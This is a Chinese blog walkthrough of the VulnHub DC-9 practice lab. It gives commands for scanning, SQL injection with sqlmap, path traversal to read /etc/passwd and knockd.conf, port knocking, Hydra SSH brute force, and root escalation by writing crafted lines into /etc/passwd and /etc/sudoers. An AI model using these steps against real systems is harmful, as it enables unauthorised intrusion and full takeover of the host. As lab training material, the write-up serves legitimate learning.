vulnhub DC-9靶场

这篇具有很好参考价值的文章主要介绍了vulnhub DC-9靶场。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录
  • 1.信息收集
  • 2.漏洞发掘
  • 3.横向渗透
  • 4.提升权限
    • 4.1构造用户行,写入/etc/passwd
    • 4.2构造权限行,写入/etc/sudoers

1.信息收集

扫描主机

sudo arp-scan -l

扫描端口,发现只有80端口

nmap -p- 192.168.42.150

扫描80开放的服务

nmap -p 80 -A -V 192.168.42.150

2.漏洞发掘

访问主页面

发现有查找功能,猜测此处有sql注入漏洞

测试sql注入漏洞

‘ or 1=1#

获取成功,存在注入漏洞,开始利用

bp开始抓包,跑sqlmap

跑出了admin的账号和密码

密码明显长度不太对,猜测为md5加密,在网上在线破解,得到密码

admin登录,开始逛街

发现下面提示,猜测有文件包含漏洞(目录穿越)

不放心可以多敲几个../

?file=../../../../../../../../../etc/passwd

因为前面我们只扫描到80端口,22没有扫到,那只有两种情况,一种22没有开放,一种有knockd服务,

该服务通过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来“敲门”,使系统开启需要访问的服务端口,才能对外访问。不使用时,再使用自定义的序列号来“关门”,将端口关闭,不对外监听。进一步提升了服务和系统的安全性。

如果开启了knockd服务,那么会存在一个配置文件/etc/knockd.conf,该配置文件中保存着需要访问的端口顺序。我们可以通过文件包含漏洞查看该配置文件

?file=/etc/knockd.conf

根据配置文件,依次访问三个端口,再次扫描,发现22端口开放

knock 192.168.42.150 7469 8475 9842

因为之前sqlmap跑出了三个数据库,我们看看另一个内容

发现一堆账号密码,尝试ssh爆破

九头蛇爆破,发现3个账号,只有janitor有东西

hybra -L 账号. txt -P 密码.txt ssh://192.168.42.150

3.横向渗透

ssh连接

ssh janitor@192.168.42.150

ls发现没文件,ls -al查看隐藏文件,发现新的密码本

重新爆破密码,发现新的账号

fredf B4-Tru3-001

4.提升权限

常规查看权限

sudo -l

尝试执行,返回错误,找到test.py,查看代码

find / -name test.py 2>/dev/null

发现代码作用需要两个文件,把第一文件追加到第二个文件后

4.1构造用户行,写入/etc/passwd

openssl生成密码,前一个xihe为账号,后一个为要加密的密码,

openssl passwd -1 -salt xihe xihe

生成的密码

$1$xihe$UAMCUAzSxt0fZHIag4Ryi1

把密码写入一个文件中,使用该脚本,追加成功

echo写不进去,用vi写

切换用户 su ,提权成功

4.2构造权限行,写入/etc/sudoers

fredf用户为root,不需要任何密码

fredf ALL=(root) NOPASSWD:ALL

echo "fredf ALL=(root) NOPASSWD:ALL" > 3.txt
sudo /opt/devstuff/dist/test/test 3.txt /etc/sudoers

sudo su root文章来源地址https://www.toymoban.com/news/detail-753904.html

到了这里,关于vulnhub DC-9靶场的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Vulnhub靶场DC-1练习

    下载链接:https://download.vulnhub.com/dc/DC-1.zip 介绍:There are five flags in total, but the ultimate goal is to find and read the flag in root’s home directory. You don’t even need to be root to do this, however, you will require root privileges.(一共有五个flags,最终目标是进入root用户的目录。) 启动以后如下图: 将

    2023年04月11日
    浏览(35)
  • vulnhub靶场之DC-2

    与DC-1非常相似,DC-2是另一个专门建造的易受攻击的实验室,目的是在渗透测试领域获得经验。 与最初的DC-1一样,它的设计考虑到了初学者。 Linux 技能和对 Linux 命令行的熟悉是必须的,对基本渗透测试工具的一些经验也是必须的。 就像DC-1一样,有五个标志,包括最后一个

    2024年01月22日
    浏览(41)
  • Web渗透漏洞靶场收集

    “如果你想搞懂一个漏洞,比较好的方法是:你可以自己先用代码编写出这个漏洞,然后再利用它,最后再修复它”。—-摘自pikachu漏洞靶场的一句话。 初学的时候玩靶场会很有意思,可以练习各种思路和技巧,用来检测扫描器的效果也是很好的选择。今天,我们来数数那些

    2024年02月07日
    浏览(39)
  • grafana 目录遍历(CVE-2021-43798)漏洞复现【VULFOCUS靶场-中级】--拿flag的历程

    漏洞名称 : grafana 目录遍历 (CVE-2021-43798) 漏洞描述 : Grafana 是一个用于监控和可观察性的开源平台。Grafana 版本 8.0.0-beta1 到 8.3.0(补丁版本除外)容易受到目录遍历,允许访问本地文件。易受攻击的 URL 路径是: grafana_host_url/public/plugins// ,其中是任何已安装插件的插件 ID。

    2024年02月15日
    浏览(39)
  • 信息收集-目录扫描(7kbscan御剑版)下载及使用

    例如:第二章-7kbscan御剑版 文章目录 前言 一、7kbscan御剑版          下载地址 二、使用步骤 1.引入库 2.读入数据 总结 提示: Web路径暴力探测工具-7kbscan御剑版 提示:以下是本篇文章正文内容,下面案例可供参考 下载地址 :  GitHub - 7kbstorm/7kbscan-WebPathBrute: 7kbscan-WebPath

    2024年02月13日
    浏览(53)
  • 网络&信息安全:nginx漏洞收集(升级至最新版本)

    💖The Begin💖点点关注,收藏不迷路💖 漏洞名称: nginx 越界写入漏洞(CVE-2022-41742) 风险等级: 高 高可利用: 否 CVE编号: CVE-2022-41742 端口(服务): 8000(nginx) 风险描述: NGINX 在 ngx_http_mp4_module 中存在漏洞,这可能允许攻击者激发 worker 进程的崩溃,或者通过使用特制的 mp4 文

    2024年04月11日
    浏览(50)
  • [Vulnhub靶机] DC-1

    [Vulnhub靶机] DC-1靶机渗透思路及方法(个人分享) 靶机下载地址: https://download.vulnhub.com/dc/DC-1.zip 靶机地址:192.168.67.28 攻击机地址:192.168.67.3 1.使用 arp-scan 命令扫描网段内存活的主机,以获取靶机ip地址 arp-scan -I 指定网卡 -l 2.使用  nmap  工具扫描靶机开放端口、服务版本

    2024年01月20日
    浏览(120)
  • [vulnhub]DC2

    信息收集 扫ip,有两种方式: arp 、 nmap 192.168.56.137 扫端口: flag1 我们使用浏览器登录80端口,发现登录不上,地址栏变为: http://dc-2 原因是dns解析不正确,我们需要在 hosts 文件中添加: 访问可以获得flag1 提示我们需要使用工具 cewl 获得字典,登录来获得flag2 flag2 cewl 首先需

    2024年02月15日
    浏览(35)
  • vulnhub-DC-6

    目标是 192.168.1.14 发现重定向到 http://wordy/ 这个网站,我们把它加入hosts文件中 发现主页是一个wordpress网站,对其进行扫描 发现了很多用户,记录下来,然后尝试一下登录界面的弱口令,没有试出弱口令,那就尝试爆破,因为爆破路径也没有什么有趣的,那攻击向量只有web喝

    2024年02月19日
    浏览(30)
  • vulnhub靶场实战系列(一)之vulnhub靶场介绍

    Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚机到获取操作系统的root权限和查看flag。 我们在学

    2024年02月10日
    浏览(41)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包